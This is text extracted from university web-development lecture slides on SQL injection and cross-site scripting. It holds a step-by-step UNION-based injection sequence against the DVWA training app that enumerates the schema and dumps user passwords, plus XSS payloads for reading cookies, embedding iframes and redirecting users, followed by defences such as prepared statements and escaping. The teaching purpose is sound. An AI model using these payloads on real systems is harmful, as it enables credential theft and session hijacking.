Download - Sql Injection and XSS
![Page 1: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/1.jpg)
webdev@rgusql injection and XSS
![Page 2: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/2.jpg)
a word of warning
Everything that we are going over today, while practical, is meant for penetration testing only! You’ll get in a lot of trouble if you use this on live websites that you don’t own!
Also…the fuzz will come after you.
![Page 3: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/3.jpg)
what is sql injection
![Page 4: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/4.jpg)
what is sql injection
SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
![Page 5: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/5.jpg)
what is sql injection
This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
![Page 6: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/6.jpg)
what is sql injection
This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
![Page 7: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/7.jpg)
what is sql injection
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
![Page 8: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/8.jpg)
what is sql injection
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
![Page 9: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/9.jpg)
what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007
SELECT * FROM softwareBugs WHERE bugID = $_GET[‘bugID’]
![Page 10: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/10.jpg)
what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007
SELECT * FROM softwareBugs WHERE bugID = 007
![Page 11: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/11.jpg)
what is sql injection
http://www.bugtracker.com/bugs.php?bugID=007 OR TRUE
SELECT * FROM softwareBugs WHERE bugID = 007 OR TRUE
can be used to gain access to all bugs
![Page 12: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/12.jpg)
worse example
http://www.bugtracker.com/changepassword.php?userID=1234&pass=mynewpass
UPDATE Users SET password = ‘pass’ WHERE userID = 1234
![Page 13: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/13.jpg)
worse example
http://www.bugtracker.com/changepassword.php?userID=1234 OR TRUE &pass=mynewpass
changes all user passwords!
UPDATE Users SET password = ‘pass’ WHERE userID = 1234 or TRUE
![Page 14: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/14.jpg)
this is easy though…who would get caught out with an
sql injection attack!?
![Page 15: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/15.jpg)
Archos 2014
![Page 16: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/16.jpg)
Wordpress February 2015
![Page 17: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/17.jpg)
Drupal Attack March 2015
![Page 18: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/18.jpg)
in-depth SQL injection
attack
dvwa
![Page 19: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/19.jpg)
This is DVWA.All of our SQL injection is going to happen using this userID box
![Page 20: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/20.jpg)
![Page 21: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/21.jpg)
1
![Page 22: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/22.jpg)
1
No SQL injection, just putting normal data into the form
![Page 23: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/23.jpg)
%' or '0'='0
![Page 24: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/24.jpg)
%' or '0'='0
All information from a table, ‘Always True’ injection
![Page 25: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/25.jpg)
%' or 0=0 union select null, version() #
![Page 26: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/26.jpg)
%' or 0=0 union select null, version() #
Finding out server information
![Page 27: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/27.jpg)
%' or 0=0 union select null, user() #
![Page 28: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/28.jpg)
%' or 0=0 union select null, user() #
Finding out the database location
![Page 29: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/29.jpg)
%' or 0=0 union select null, database() #
![Page 30: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/30.jpg)
%' or 0=0 union select null, database() #
finding out the name of the database
![Page 31: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/31.jpg)
%' and 1=0 union select null, table_name from information_schema.tables #
![Page 32: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/32.jpg)
%' and 1=0 union select null, table_name from information_schema.tables #
Information_Schema part of the database
![Page 33: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/33.jpg)
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
![Page 34: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/34.jpg)
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
finding tables that mention the word ‘user’ at the start
![Page 35: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/35.jpg)
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
![Page 36: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/36.jpg)
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Finding the names of all the fields from the table ‘users’
![Page 37: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/37.jpg)
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
![Page 38: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/38.jpg)
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
finding all of the information stored in the table users
![Page 39: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/39.jpg)
And this is what we are after! The admin password!
![Page 40: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/40.jpg)
![Page 41: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/41.jpg)
![Page 42: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/42.jpg)
what is Cross site Scripting
![Page 43: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/43.jpg)
What is cross site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
XSS enables attackers to inject client-side script into Web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
![Page 44: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/44.jpg)
What is cross site scripting
In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script.
The victim's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.
![Page 45: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/45.jpg)
![Page 46: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/46.jpg)
![Page 47: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/47.jpg)
<script>alert("This is a XSS Exploit Test")</script>
![Page 48: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/48.jpg)
<script>alert("This is a XSS Exploit Test")</script>
Displays an alert message when a person visits the screen
![Page 49: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/49.jpg)
<iframe src="http://www.cnn.com"></iframe>
![Page 50: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/50.jpg)
<iframe src="http://www.cnn.com"></iframe>
Creates an iframe that can hold information from another site
![Page 51: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/51.jpg)
<script>alert(document.cookie)</script>
![Page 52: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/52.jpg)
<script>alert(document.cookie)</script>
Displays an alert message with the users current cookie
![Page 53: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/53.jpg)
<script>window.location=“http://www.example.com”</script>
Auto redirects a user
![Page 54: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/54.jpg)
![Page 55: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/55.jpg)
(I’m sorry)
![Page 56: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/56.jpg)
<script>alert("This is a XSS Exploit Test")</script>
<iframe src="http://www.cnn.com"></iframe>
<script>alert(document.cookie)</script>
<script>window.location=“http://www.example.com”</script>
simple test
Embed content into the page
Get the current cookie used by a user
redirect the user to a different page
![Page 57: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/57.jpg)
protecting against sql
injection and xss
![Page 58: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/58.jpg)
sql injection
Prepared Statements Stored Procedures Escaping all user supplied input
Least Privilege White List Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
![Page 59: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/59.jpg)
Never insert untrusted data except in allowed locations HTML Escape before inserting untrusted data into HTML Attribute Escape… Javascript Escape… CSS Escape… URL Escape…
In other words…check EVERYTHING! XSS is very common and is really easy to exploit
XSS
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
![Page 60: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/60.jpg)
We’re going to do a lot more protection in the lab…don’t worry!
is that it!?
Going to give you a chance to improve a websites security in terms of SQL injection and XSS vulnerabilities.
If you want to try some of these things out yourself…we’re working on it
Getting DVWA to work properly on a secure network is difficult, even ours!
![Page 61: Sql Injection and XSS](https://reader031.vdocuments.net/reader031/viewer/2022030317/58705a541a28aba2118b652f/html5/thumbnails/61.jpg)
webdev@rgusql injection and XSS